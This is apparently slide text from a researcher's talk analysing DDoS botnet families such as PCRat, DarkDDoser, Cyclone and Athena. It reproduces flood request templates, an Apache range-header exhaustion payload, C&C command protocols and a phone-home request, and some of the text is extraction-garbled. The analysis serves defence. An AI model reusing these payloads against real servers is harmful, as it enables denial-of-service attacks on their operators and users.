x6ax66x64xa0xa0xe0xa0x60xa4x67x62xe0xee
x51x55x63x64x60x68xc4xc0x00x00x8fxe3x14x0c"!
>>> hex(len(data))!
'0x5d’!
>>> import zlib!
>>> inf = zlib.decompress(data[13:])!
>>> print inf!
LANG:1033|Win XP SP2|256 MB|Intel(R) Xeon(R) CPU E5620 @ 2.40GHz|
2012!
>>> hex(len(inf))!
'0x53'!
18
20. PCRat – DDoS Attack Commands
• ICMP Echo Request Flood
A --------- PING(1024 “I”s) ----------> B
A --------- PING(1024 “I”s) ----------> B
A --------- PING(1024 “I”s) ----------> B
…
• UDP Flood Types 1, 2, and 3
A --------- UDP(4000 “random bytes”) ----------> B
A --------- UDP(36 “hardcoded bytes”) ---------> B
A --------- UDP(1024 “A”s) -------------------------> B
…
20
21. PCRat – DDoS Attack Commands cont.
• TCP SYN Flood
A --------- SYN(spoofed src IP) ----------> B
A --------- SYN(spoofed src IP) ----------> B
A --------- SYN(spoofed src IP) ----------> B
…
• TCP SYN/ACK Flood
A --------- SYN/ACK ----------> B
A --------- SYN/ACK ----------> B
A --------- SYN/ACK ----------> B
…
21
22. PCRat – DDoS Attack Commands cont.
• TCP Connection Flood
A --------- SYN ----------> B
A <----- SYN/ACK ------ B
A --------- ACK ----------> B
close()
…
• TCP Flood Types 1, 2, and 3
A --------- TCP(1024 “random bytes”) ------------------> B
A --------- TCP(1024 “C&C specified bytes”) ---------> B
A --------- TCP(2048 “a”s) ---------------------------------> B
…
22
23. PCRat – DDoS Attack Commands cont.
• HTTP Request Flood Type 1
GET %s HTTP/1.1rn!
Host: %srn!
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:
1.9.0.15) Gecko/2009101601 Firefox/3.0.15Cache-Control: no-
store, must-revalidatern!
Referer: %s%srn!
Connection: keep-alivernrn!
• HTTP Request Flood Type 2
GET %s HTTP/1.1rn!
Host: %srn!
Cache-Control: no-store, must-revalidatern!
Referer: %s%srn!
Connection: Closernrn!
!
23
24. PCRat – DDoS Attack Commands cont.
• HTTP Request Flood Type 3
GET / HTTP/1.1rn!
Host: %srn!
Cache-Control: no-cachern!
Connection: Closernrn!
• HTTP Request Flood Type 4
GET %s HTTP/1.1rn!
Content-Type: text/htmlrn!
Host: %srn!
Accept: text/html, */*rn!
User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0;
MyIE 3.01)rnrn!
!
24
26. DarkDDoser
• Programmed in Delphi
• Written by HaLLaFaMeR x2
• Costs $30
• Boasts 5 Floods
– SYN flood
– UDP flood
– HTTP GET flood
– “SlowLoris”
– “ARME”
• Claims to be rewriting in C++
28. 28
Search Warrant Email Account
hallafamerx2@gmail.com, et al
Case Number: 2:2011mc50698
Filed: June 7, 2011
Court: Michigan Eastern District Court
Office: Detroit Office
County: Wayne
Presiding Judge: George Caram Steeh
Nature of Suit: Other Statutes - Other Statutory
Actions
Jurisdiction: Federal Question
Jury Demanded By: None
29. DarkDDoser CnC
• Many CnCs using dynamic DNS
• Simple pipe-delimited protocol on random ports
– ADDNEW|Stable|5.6c|US|Windows XP x86|Idle...|3175|NEW!
– ARME|192.168.56.1|www.google.com|30|5!
– ARME|<IP Address>|<Host header>|<Num forks>
<Num threads>!
– SLOW|192.168.56.1|192.168.56.1|<Sockets>|<Num Forks>|
<Method>!
– HTTP|192.168.56.1|www.google.com|1|3000|POST!
– UDP|192.168.56.1|80|65|6000|6000|55|6!
– STATUS|Idle…!
32. DarkDDoser Basic Floods
• UDP
– Standard flood, packet size specified by CnC
– Random port
• SYN
– Not spoofed, random ports
• HTTP
GET <target URI> HTTP/1.1!
Host: 10.1.10.68!
User-Agent: <random user-agent from list>!
Accept: */*;q=0.1!
Accept-Encoding: gzip,deflate!
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8!
Referer: <random referer from list>!
Content-Type: application/x-www-form-urlencoded!
Connection: Keep-Alive!
33. DarkDDoser Slowloris
GET / HTTP/1.1!
Host: <website>!
User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us)
AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/
531.21.102011-10-16 20:23:10!
Accept: */*;q=0.1!
Accept-Encoding: gzip,deflate!
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8!
Referer: www.meta.ua!
Content-Type: application/x-www-form-urlencoded!
Connection: Keep-Alive!
34. 34
Apache ARME Vulnerability
• Apache allocates range requests into buckets
• Each range allocates more memory
• Large number of overlapping range requests
causes large amt of memory allocation
• Example:
• Range: bytes=5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,
5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,
5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,
5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-110,
5-111,5-112,5-113,5-114,5-115,5-116,5-117,5-118,5-119,5-120,5-121,5-122,5-123,5-124,
5-125,5-126,5-127,5-128,5-129,5-130,5-131,5-132,5-133,5-134,5-135,5-136,5-137,5-138,
5-139,5-140,5-141,5-142,5-143,5-144,5-145,5-146,5-147,5-148,5-149,5-150,5-151,5-152,
5-153,5-154,5-155,5-156,5-157,5-158,5-159,5-160,5-161,5-162,5-163,5-164,5-165,5-166,
5-167,5-168,5-169,5-170,5-171,5-172,5-173,5-174,5-175,5-176,5-177,5-178,5-179,5-180, 5-181,5-182,5-183
35. DarkDDoser ARME
HEAD / HTTP/1.1!
Host: <target>!
User-Agent: Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/
534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+2011-10-16
20:21:10!
Range: bytes=0-63!
Accept-Encoding: gzip!
Connection: close!
!
HEAD / HTTP/1.1!
Host: <target>!
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)!
Range: bytes=0-36!
Accept-Encoding: gzip!
Connection: close!
!
45. Cyclone – Command and Control
• IRC based (yep, still being used)
• C&C details are obfuscated using the same
method as MP-Ddoser/IP Killer
• Jeff Edwards of Arbor Networks has written a
decoder
45
47. Cyclone – Identified Command
• .login <password> - log in to bot
• .logout - log out of bot
• .rc - reconnect to IRC server
• .status - show DoS attack status
• .info - show system information
• .uninstall - remove self
• .kill - kill and remove self
• .stop - stop DoS attacks
• .dl <URL> - download and execute
• .botkiller - kill off other bots on the host
• .ftp - pillage Filezilla credentials
• DDoS attacks (described next)
47
48. Cyclone – DDoS Attack Commands
• .udp
A --------- UDP(2000 “digits and lowercase letters”) ----------> B
A --------- UDP(2000 “digits and lowercase letters”) ----------> B
A --------- UDP(2000 “digits and lowercase letters”) ----------> B
…
• .arme
– ARME (Apache Remote Memory Exhaustion) a.k.a. Apache Killer
attack by Kingcope
HEAD / HTTP/1.1!
!Host: 10.1.6.71!
!Range:bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,…a lot more…
5-1298,5-1299!
!Accept-Encoding: gzip!
!Connection: close!
48
49. Cyclone – DDoS Attack Commands cont.
• .layer7
– Randomly chooses out of 44 possible User-Agents
HEAD / HTTP/1.1!
Host: 10.1.6.71!
User-Agent: Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.3) Gecko/
20060426 Firefox/1.5.0.3!
Connection: keep-alive!
• .slowloris
– Randomly chooses a Content-Length value between 100000000 and
510065408
– Not a proper Slowloris attack (not slow!)
POST / HTTP/1.1!
Host: 68.42.70.60!
Connection: keep-alive!
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/
534.56.5 (KHTML, like Gecko) Version/5.1.6 Safari/534.56.5!
Content-Length: 429844219!
49
50. Cyclone – DDoS Attack Commands cont.
• .httpget
– Referer is comprised of 10 random lowercase letters followed by a
randomly selected generic TLD (10 possibilities)
GET / HTTP/1.0!
Host: 68.42.70.60!
Keep-Alive: 300!
Connection: keep-alive!
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)!
Referer: z6j4ncowgj.info!
• .httpdownload
GET / HTTP/1.0!
Host: 68.42.70.60!
Keep-Alive: 300!
Connection: keep-alive!
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101
Firefox/12.0!
Referer: ypoq1xlx2s.rs!
50
51. Cyclone – DDoS Attack Commands cont.
• .httpstrong
– R-U-Dead-Yet (RUDY) attack
– POST data is an endless stream of lowercase letters and digits
POST / HTTP/1.0!
Host: 10.1.6.71!
Keep-Alive: 300!
Connection: keep-alive!
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3)
Gecko/20090824 Firefox/3.5.3!
Content-Type: application/x-www-form-urlencoded!
Content-Length: 1000000!
Referer: 7k8qhka5ym.net!
!
eiq48mw17v3mb7...!
51
54. Athena
• Started as IRC bot, recently evolved to HTTP
• Consistent updating
• Author contact info:
– Jabber: AthenaIRC@thesecure.biz
– MSN: AthenaIRC@hotmail.com
– ICQ: 618099251
55. 55
Athena Pricing
• 100$ - Solitary bin of Athena built to customer-specified
configuration
10$ - Rebuild / Update of bin
15$ - I will set up your IRC myself so it is most-suitable for
Athena on a server of yours through TeamViewer, join.me,
PuTTY, etc.
• 130$ - Ready channel spot capable of holding 20k bots and
a bin of Athena -Prices are not permenant and can be
subject to change at any point in time
-After purchase, it is up to the buyer to contact either me. I
will not chase you down.
-PayPal and Liberty Reserve are accepted.
56. 56
Athena Versions / Builders
• Cracked builders for 1.8.3 and 1.8.7 available
– Version set to Athena=shit!
– Contains string “IPKiller>Athena”
– Versions from 2.1 -> 2.2 -> 2.3 observed in our
corral
• Version 2 has more features
• Removes standalone btcwallet command
• Adds filesearch to accomplish that + more
57. Athena Features
• Bitcoin wallet stealing
• File search + upload
• Password stealing
• Visit website
• Download and execute file
• IRC War
• Execute commands
• “Encrypted” IP
• Encrypted commands
66. SATBOT – Stats
• 12 unique executables
• First seen: September 11, 2012
• Last seen: February 11, 2013
• Connections, 1 unique destination (resolved
March 14, 2013)
– 216.86.156.135
(ip135.216-86-156.static.steadfastdns.net | ASN
32748 | STEADFAST NETWORKS)
66
67. SATBOT – Maybe Attribution
• IP is hosting a Website – “Stock Gumshoe:
Secret Teaser Stocks Revealed”
– “Feels” shady, but could be a hacked site
67
68. SATBOT – Identified Commands
• auth – login
• stopddos - stop SYN flood
• info - get system information
• listproc - get process listing
• dir - get directory listing
• prd - setup port redirection
• srd - stop port redirection
• dwn - download and execute
• seeya - remove self
• websrv - start a password protected directory listing web server
• stopweb - stop web server
• terminate - terminate a process
• logout - log out
• spam - spread self via IM
• raw - echo back message
• rnb - change nickname
• syn – launch SYN flood
– Proper SYN flood
68
70. Aside: SYN Flood “Commands”
• A lot of them tend to be implemented as TCP connection floods
– Easier to use a connect()
A --------- SYN ----------> B
A <----- SYN/ACK ------ B
A --------- ACK ----------> B
close()
…
vs
A --------- SYN ----------> B
A --------- SYN ----------> B
A --------- SYN ----------> B
…
70
72. Cynic
• Bot coded in C
• Author(s) unknown
• Intially posts a request to /cynic/gate.php
• Appears to be IRC CnC after that*
• Only a handful of samples observed in our
corral
72
73. Cynic String Encoding
• Strings are stored encrypted
• Hard-coded plain-text key
• String byte XOR’d against all key bytes, then
logical NOT’d
• Main decryption routine calls decrypt routine
with key for all strs
• Strings contained
– Registry keys
– Imports
– Phone home information
73
74. Cynic CnC
!
POST /cynic/gate.php HTTP/1.1!
Content-Type: application/x-www-form-urlencoded!
Cache-Control: no-cache!
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)!
Host: ix.kasprsky.org!
Content-Length: 53!
Connection: Close!
!
;.......g..........L9:..R....hb.].e....(...(.{T....jb!
74
80. Trends and Takeaways
• Packaging of DDoS attacks in malware
– Either one TCP connection flooder tacked onto a RAT/
traditional bot
– Or a package of 20-something flooders for a DDoS-specific
bot
• Copy and paste culture
– Hard to classify families
• Coders not paying attention
– Lots of typos and missing pieces
– Broken implementations of attacks
• Too many flood types
– Can be tedious to reverse out the details
80
82. Trends and Takeaways cont.
• Hash table DoS attacks haven’t really been weaponized at the botnet
level yet
– Jeff Edwards of Arbor Networks has talked about similar delays
from proof-of-concept to weaponization when Slowloris, ARME, etc.
were released
• Obfuscation tends to be XOR, base64, rot13, or zlib based
– Sometimes RC4 – but the plaintext key is readily available
– Everyone will reverse RC4 at least once…
– And gzip…
• C&C via IRC is still common
• Delphi code usually means Russians
• Reversing Visual Basic bots
– Oh god, my eyes!
– Rage quits
82
85. Trends and Takeaways cont.
• Future research will start focusing more on attribution
– Mandiant APT1 release
• PHP DDoS botnets are hot at the moment
– Triple Crown Attacks on US banks
– Effective, but the scripts themselves and the backend infrastructure
seem relatively immature
• DNS Amplification attacks are also hot
– Spamhaus DDoS attacks in late March 2013
• One of the largest seen so far
• Spawned open resolver project
• Attention to “DDoS as a Service” providers will rise
– Krebs on Security DDoS/SWATing attack in March 2013
– Game booters
85